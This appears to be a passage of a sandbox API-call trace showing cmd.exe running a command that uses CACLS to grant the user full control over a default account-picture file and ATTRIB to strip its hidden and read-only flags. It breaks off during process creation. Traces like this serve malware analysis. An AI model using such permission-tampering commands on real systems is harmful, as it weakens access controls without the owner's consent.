(_Type=0x1) [0182.340] __p__fmode () returned 0x76b331f4 [0182.340] __p__commode () returned 0x76b331fc [0182.340] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0182.340] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0182.340] GetCurrentThreadId () returned 0x51c [0182.340] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x51c) returned 0x38 [0182.340] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.340] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0182.340] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.340] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.340] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fe2c | out: phkResult=0x28fe2c*=0x0) returned 0x2 [0182.340] VirtualQuery (in: lpAddress=0x28fe63, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.340] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.341] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.341] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.341] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0182.341] GetConsoleOutputCP () returned 0x1b5 [0182.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.341] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0182.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.341] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0182.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.341] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.341] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.341] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.341] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.341] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.341] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0182.342] GetEnvironmentStringsW () returned 0x440308* [0182.342] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.342] GetEnvironmentStringsW () returned 0x440308* [0182.342] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0xb8, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegCloseKey (hKey=0x40) returned 0x0 [0182.342] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.343] RegCloseKey (hKey=0x40) returned 0x0 [0182.343] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886390 [0182.343] srand (_Seed=0x5b886390) [0182.343] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" [0182.343] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" [0182.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.343] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0182.343] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.343] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.343] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.343] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.343] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.343] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.343] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.344] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.344] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0182.344] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.344] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.344] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.344] GetEnvironmentStringsW () returned 0x442458* [0182.344] FreeEnvironmentStringsW (penv=0x442458) returned 1 [0182.344] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.344] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.344] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.344] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.344] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.344] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.344] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.344] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.344] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.344] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.344] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fb68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.344] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fb68, lpFilePart=0x28fb64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fb64*="Desktop") returned 0x18 [0182.344] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.344] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x440ae8 [0182.344] FindClose (in: hFindFile=0x440ae8 | out: hFindFile=0x440ae8) returned 1 [0182.345] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x440ae8 [0182.345] FindClose (in: hFindFile=0x440ae8 | out: hFindFile=0x440ae8) returned 1 [0182.345] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x440ae8 [0182.345] FindClose (in: hFindFile=0x440ae8 | out: hFindFile=0x440ae8) returned 1 [0182.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.345] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0182.345] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0182.345] GetEnvironmentStringsW () returned 0x440308* [0182.345] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.346] GetConsoleOutputCP () returned 0x1b5 [0182.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.346] GetUserDefaultLCID () returned 0x409 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fca8, cchData=128 | out: lpLCData="1") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0182.346] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.347] GetConsoleTitleW (in: lpConsoleTitle=0x4309b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.347] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.347] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0182.347] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0182.348] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0182.348] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0182.349] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0182.349] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0182.349] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0182.349] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0182.349] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0182.349] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0182.349] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0182.351] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0182.351] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0182.351] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0182.351] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0182.351] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0182.351] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0182.351] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0182.353] GetConsoleTitleW (in: lpConsoleTitle=0x28f93c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.354] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.354] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.354] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.354] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.354] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.354] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.354] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.354] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.354] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.354] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.354] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.354] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.354] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.354] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.354] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.354] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.354] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.354] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.354] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.354] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.355] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.355] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.355] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.355] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.355] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.355] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.355] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.355] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.355] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.355] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.355] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.355] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.355] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.355] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.355] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.355] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.355] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.355] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0182.355] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0182.355] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0182.356] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0182.356] SetErrorMode (uMode=0x0) returned 0x0 [0182.356] SetErrorMode (uMode=0x1) returned 0x0 [0182.356] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x441e98, lpFilePart=0x28f45c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f45c*="Desktop") returned 0x18 [0182.356] SetErrorMode (uMode=0x0) returned 0x1 [0182.356] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.356] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.367] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.368] GetLastError () returned 0x2 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.368] GetLastError () returned 0x2 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x442180 [0182.368] FindClose (in: hFindFile=0x442180 | out: hFindFile=0x442180) returned 1 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.368] GetLastError () returned 0x2 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x442180 [0182.369] FindClose (in: hFindFile=0x442180 | out: hFindFile=0x442180) returned 1 [0182.369] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.369] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.369] GetConsoleTitleW (in: lpConsoleTitle=0x28f6d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.369] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f558, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f620 | out: lpAttributeList=0x28f558, lpSize=0x28f620) returned 1 [0182.370] UpdateProcThreadAttribute (in: lpAttributeList=0x28f558, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f618, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f558, lpPreviousValue=0x0) returned 1 [0182.370] GetStartupInfoW (in: lpStartupInfo=0x28f514 | out: lpStartupInfo=0x28f514*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.370] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.371] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, 